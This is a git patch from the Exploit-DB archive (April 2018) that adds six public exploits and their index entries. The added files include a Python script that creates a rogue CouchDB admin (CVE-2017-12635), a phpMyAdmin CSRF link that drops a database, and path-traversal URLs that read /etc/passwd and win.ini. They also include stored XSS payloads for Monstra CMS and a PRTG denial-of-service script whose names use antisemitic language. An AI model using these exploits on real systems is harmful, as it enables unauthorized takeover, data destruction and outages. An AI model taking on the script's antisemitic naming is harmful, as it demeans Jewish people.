From 082f2d1bd89052cc0523547c2912106e662ad79d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 24 Apr 2018 05:01:45 +0000
Subject: [PATCH] DB: 2018-04-24

6 changes to exploits/shellcodes

PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)
phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery
Ncomputing vSpace Pro v10 and v11 - Directory Traversal PoC
Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
Monstra cms 3.0.4 - Persitent Cross-Site Scripting
---
 exploits/linux/webapps/44498.py    | 66 ++++++++++++++++++++++++
 exploits/php/webapps/44496.html    | 24 +++++++++
 exploits/php/webapps/44501.txt     | 23 +++++++++
 exploits/php/webapps/44502.txt     | 28 +++++++++++
 exploits/windows/webapps/44497.txt | 37 ++++++++++++++
 exploits/windows_x86/dos/44500.py  | 80 ++++++++++++++++++++++++++++++
 files_exploits.csv                 |  6 +++
 7 files changed, 264 insertions(+)
 create mode 100755 exploits/linux/webapps/44498.py
 create mode 100644 exploits/php/webapps/44496.html
 create mode 100644 exploits/php/webapps/44501.txt
 create mode 100644 exploits/php/webapps/44502.txt
 create mode 100644 exploits/windows/webapps/44497.txt
 create mode 100755 exploits/windows_x86/dos/44500.py

diff --git a/exploits/linux/webapps/44498.py b/exploits/linux/webapps/44498.py
new file mode 100755
index 000000000..cc1a318c3
--- /dev/null
+++ b/exploits/linux/webapps/44498.py
@@ -0,0 +1,66 @@
+# Exploit Title: Apache CouchDB JSON 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
+# Date: 2017-08-07
+# Exploit Author: Sebastián Castro @r4wd3r
+# Vendor Homepage: https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/
+# Software Link: http://couchdb.apache.org/
+# Version: Apache CouchDB 1.7.0 and 2.x before 2.1.1
+# CVE : CVE-2017-12635
+
+#!/usr/bin/env python
+
+import argparse
+import re
+import sys
+import requests
+
+parser = argparse.ArgumentParser(
+    description='Exploits the Apache CouchDB JSON Remote Privilege Escalation Vulnerability' +
+    ' (CVE-2017-12635)')
+parser.add_argument('host', help='Host to attack.', type=str)
+parser.add_argument('-p', '--port', help='Port of CouchDB Service', type=str, default='5984')
+parser.add_argument('-u', '--user', help='Username to create as admin.',
+                    type=str, default='couchara')
+parser.add_argument('-P', '--password', help='Password of the created user.',
+                    type=str, default='couchapass')
+args = parser.parse_args()
+
+host = args.host
+port = args.port
+user = args.user
+password = args.password
+
+pat_ip = re.compile("^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$")
+if not pat_ip.match(host):
+    print "[x] Wrong host. Must be a valid IP address."
+    sys.exit(1)
+
+print "[+] User to create: " + user
+print "[+] Password: " + password
+print "[+] Attacking host " + host + " on port " + port
+
+url = 'http://' + host + ':' + port
+
+try:
+    rtest = requests.get(url, timeout=10)
+except requests.exceptions.Timeout:
+    print "[x] Server is taking too long to answer. Exiting."
+    sys.exit(1)
+except requests.ConnectionError:
+    print "[x] Unable to connect to the remote host."
+    sys.exit(1)
+
+# Payload for creating user
+cu_url_payload = url + "/_users/org.couchdb.user:" + user
+cu_data_payload = '{"type": "user", "name": "'+user+'", "roles": ["_admin"], "roles": [], "password": "'+password+'"}'
+
+try:
+    rcu = requests.put(cu_url_payload, data=cu_data_payload)
+except requests.exceptions.HTTPError:
+    print "[x] ERROR: Unable to create the user on remote host."
+    sys.exit(1)
+
+if rcu.status_code == 201:
+    print "[+] User " + user + " with password " + password + "successfully created."
+    sys.exit(0)
+else:
+    print "[x] ERROR " + rcu.status_code + ": Unable to create the user on remote host."
\ No newline at end of file
diff --git a/exploits/php/webapps/44496.html b/exploits/php/webapps/44496.html
new file mode 100644
index 000000000..e6f689940
--- /dev/null
+++ b/exploits/php/webapps/44496.html
@@ -0,0 +1,24 @@
+# Exploit Title: phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery
+# Date: 2018-04-20
+# Software Link: https://www.phpmyadmin.net/
+# Author: @revengsh & @0x00FI
+# CVE: CVE-2018-10188
+# Category: Webapps
+
+
+#1. Description
+#The vulnerability exists due to failure in the "/sql.php" script to properly verify the source of HTTP request.
+#This Cross-Site Request Forgery (CSRF) allows an attacker to execute arbitrary SQL statement by sending a malicious request to a logged in user.
+#2. Proof of Concept: This example sends HTTP GET crafted request in order to drop the specified database.
+
+
+<html>
+  <body>
+    <a href="http://[HOST]/phpmyadmin/sql.php?sql_query=DROP+DATABASE+[DBNAME]">
+      Drop database
+    </a>
+  </body>
+</html>
+
+#3. Solution: Upgrade to phpMyAdmin 4.8.0-1 or newer.
+#4. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10188
\ No newline at end of file
diff --git a/exploits/php/webapps/44501.txt b/exploits/php/webapps/44501.txt
new file mode 100644
index 000000000..70c8b3ee5
--- /dev/null
+++ b/exploits/php/webapps/44501.txt
@@ -0,0 +1,23 @@
+#Title: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
+#Author: Larry W. Cashdollar
+#Date: 2018-03-30
+#CVE-ID: CVE-2018-9205
+#Download Site: https://www.drupal.org/project/avatar_uploader
+#Vendor: https://www.drupal.org/u/robbinzhao
+#Vendor Notified: 2018-04-02
+#Vendor Contact: https://www.drupal.org/project/avatar_uploader/issues/2957966#comment-12554146
+#Advisory: http://www.vapidlabs.com/advisory.php?v=202
+
+#Description: This module used Simple Ajax Uploader, and provide a basic uploader panel, for more effect, you can do your custom javascript. Such as, users' mouse hover on avatar, the edit link will slideup, or others.
+#Vulnerability:
+#The view.php contains code to retrieve files but no code to verify a user should be able to view files or keep them from changing the path to outside of the uploadDir directory:
+
+<?php
+
+$file = $_GET['file'];
+
+echo file_get_contents("uploadDir/$file");
+exit;
+
+Exploit Code:
+http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
\ No newline at end of file
diff --git a/exploits/php/webapps/44502.txt b/exploits/php/webapps/44502.txt
new file mode 100644
index 000000000..6e18925fd
--- /dev/null
+++ b/exploits/php/webapps/44502.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Monstra cms 3.0.4 - Persitent Cross-Site Scripting
+# Date: 2018-04-14
+# Exploit Author: Wenming Jiang
+# Vendor Homepage: https://github.com/monstra-cms/monstra
+# Software Link: https://github.com/monstra-cms/monstra
+# Version: 3.0.4
+# Tested on: php 5.6, apache2.2.29, macos 10.12.6
+# CVE :CVE-2018-10109
+
+
+#Description:
+#Monstra CMS 3.0.4 has a stored XSS vulnerability when an attacker has access to the editor role, and enters the payload
+#in the content section of a new page in the blog catalog.
+
+
+#Steps to replicate:
+#1. log into the system as an editor role
+#2. creat a new page in the blog catalog
+#3. navigate to content section
+#4. enter payload: <script>alert(document.cookie)</script>
+#5. visit http://<your_site>/monstra/blog/<page_name>.php, you will triage JavaScript execution
+
+
+
+#Exploit Code:
+<script>alert(document.cookie)</script>
+or
+<img src=1 onerror=alert(/xss/) >
\ No newline at end of file
diff --git a/exploits/windows/webapps/44497.txt b/exploits/windows/webapps/44497.txt
new file mode 100644
index 000000000..df89b19d3
--- /dev/null
+++ b/exploits/windows/webapps/44497.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability
+# Date: 2018-04-20
+# Software Vendor: NComputing
+# Software Link: 
+# Author: Javier Bernardo
+# CVE: CVE-2018-10201
+# Category: Webapps
+
+#[Description]
+#
+#It is possible to read arbitrary files outside the root directory of
+#the web server. This vulnerability could be exploited remotely by a
+#crafted URL without credentials, with …/ or …\ or …./ or ….\ as a
+#directory-traversal pattern to TCP port 8667.
+#
+#An attacker can make use of this vulnerability to step out of the root
+#directory and access other parts of the file system. This might give
+#the attacker the ability to view restricted files, which could provide
+#the attacker with more information required to further compromise the system.
+
+#[PoC]
+
+nmap -p T:8667 -Pn your_vSpace_server
+
+Nmap scan report for your_vSpace_server (x.x.x.x)
+Host is up (0.044s latency).
+
+PORT     STATE SERVICE
+8667/tcp open  unknown
+
+http://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini
+
+http://your_vSpace_server:8667/...\...\...\...\...\...\...\...\...\windows\win.ini
+
+http://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini
+
+http://your_vSpace_server:8667/....\....\....\....\....\....\....\....\....\windows\win.ini
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/44500.py b/exploits/windows_x86/dos/44500.py
new file mode 100755
index 000000000..a4463456e
--- /dev/null
+++ b/exploits/windows_x86/dos/44500.py
@@ -0,0 +1,80 @@
+# Exploit Title: PRTG 18.1.39.1648 - Stack Overflow
+# Date: 2018-04-21
+# Exploit Author: Lucas "luriel" Carmo
+# Vendor Homepage: https://www.paessler.com/prtg
+# Software Link: https://www.paessler.com/download/prtg-download
+# Version: 18.1.39.1648
+# CVE : CVE-2018-10253
+# Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5
+# http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/
+
+#!/usr/bin/python
+
+import requests
+import sys
+import os
+import re
+import socket
+
+green = "\033[1;32m"
+yellow = '\033[1;33m'
+normal = '\033[0;0m'
+banner = """
+     ██╗███████╗██╗    ██╗██╗███████╗██╗  ██╗    ███╗   ██╗ █████╗ ██████╗  █████╗ ██╗     ███╗   ███╗
+     ██║██╔════╝██║    ██║██║██╔════╝██║  ██║    ████╗  ██║██╔══██╗██╔══██╗██╔══██╗██║     ████╗ ████║
+     ██║█████╗  ██║ █╗ ██║██║███████╗███████║    ██╔██╗ ██║███████║██████╔╝███████║██║     ██╔████╔██║
+██   ██║██╔══╝  ██║███╗██║██║╚════██║██╔══██║    ██║╚██╗██║██╔══██║██╔═══╝ ██╔══██║██║     ██║╚██╔╝██║
+╚█████╔╝███████╗╚███╔███╔╝██║███████║██║  ██║    ██║ ╚████║██║  ██║██║     ██║  ██║███████╗██║ ╚═╝ ██║
+ ╚════╝ ╚══════╝ ╚══╝╚══╝ ╚═╝╚══════╝╚═╝  ╚═╝    ╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝     ╚═╝  ╚═╝╚══════╝╚═╝     ╚═╝
+"""
+
+
+banner2 = """
+                                            Author: @Lucas "luriel" Carmo
+"""
+
+os.system('clear')
+
+print(green+banner)
+print(yellow+banner2)
+print(normal)
+
+def check_http(url):
+    pattern = re.compile("http://")
+    return re.search(pattern, url)
+
+def sanitize_url(url):
+    if(not check_http(url)):
+        return "http://" + url
+    return url
+
+def check_server(url):
+    r = requests.get(url, timeout=4)
+    code = r.status_code
+
+def send_jewish_payload(url):
+    payload = {'file':'addmap.htm'}
+    r = requests.post(url, params=payload)
+
+def main():
+    try:
+        if len(sys.argv) <= 3 and len (sys.argv) >= 2:
+            try:
+                url = sanitize_url(sys.argv[1])
+                print(' [#] LOADING!')
+                if (check_server(url) != 404):
+                    send_jewish_payload(url)
+                else:
+                    print(' [!] Server shutdown or not found')
+            except requests.exceptions.ConnectionError:
+                print(' [~] BOOOOOM! PRTG Server has been exploded!')
+            except requests.exceptions.InvalidURL:
+                print(' [!] Invalid URL')
+            except requests.exceptions.Timeout:
+                print(' [!] Connection Timeout\n')
+        else:
+            print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')
+    except KeyboardInterrupt:
+        print(' [!] Jewish Napalm Canceled;.....[./]')
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8446b9183..fc31b6a22 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5941,6 +5941,7 @@ id,file,description,date,author,type,platform,port
 44490,exploits/linux/dos/44490.txt,"PDFunite 0.41.0 - '.pdf' Local Buffer Overflow",2018-04-18,Hamm3r.py,dos,linux,
 44491,exploits/multiple/dos/44491.txt,"RSVG 2.40.13 / 2.42.2 - '.svg' Buffer Overflow",2018-04-18,Hamm3r.py,dos,multiple,
 44494,exploits/windows/dos/44494.py,"VX Search 10.6.18 - 'directory' Local Buffer Overflow",2018-04-18,"Kevin McGuigan",dos,windows,
+44500,exploits/windows_x86/dos/44500.py,"PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)",2018-04-23,luriel,dos,windows_x86,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -39188,3 +39189,8 @@ id,file,description,date,author,type,platform,port
 44492,exploits/php/webapps/44492.txt,"Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery",2018-04-18,"Sureshbabu Narvaneni",webapps,php,80
 44493,exploits/xml/webapps/44493.txt,"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities",2018-04-18,bzyo,webapps,xml,
 44495,exploits/php/webapps/44495.txt,"Cobub Razor 0.8.0 - Physical path Leakage",2018-04-20,Kyhvedn,webapps,php,
+44496,exploits/php/webapps/44496.html,"phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery",2018-04-23,revengsh,webapps,php,
+44497,exploits/windows/webapps/44497.txt,"Ncomputing vSpace Pro v10 and v11 - Directory Traversal PoC",2018-04-23,"Javier Bernardo",webapps,windows,
+44498,exploits/linux/webapps/44498.py,"Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation",2018-04-23,r4wd3r,webapps,linux,
+44501,exploits/php/webapps/44501.txt,"Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure",2018-04-23,"Larry W. Cashdollar",webapps,php,
+44502,exploits/php/webapps/44502.txt,"Monstra cms 3.0.4 - Persitent Cross-Site Scripting",2018-04-23,"Wenming Jiang",webapps,php,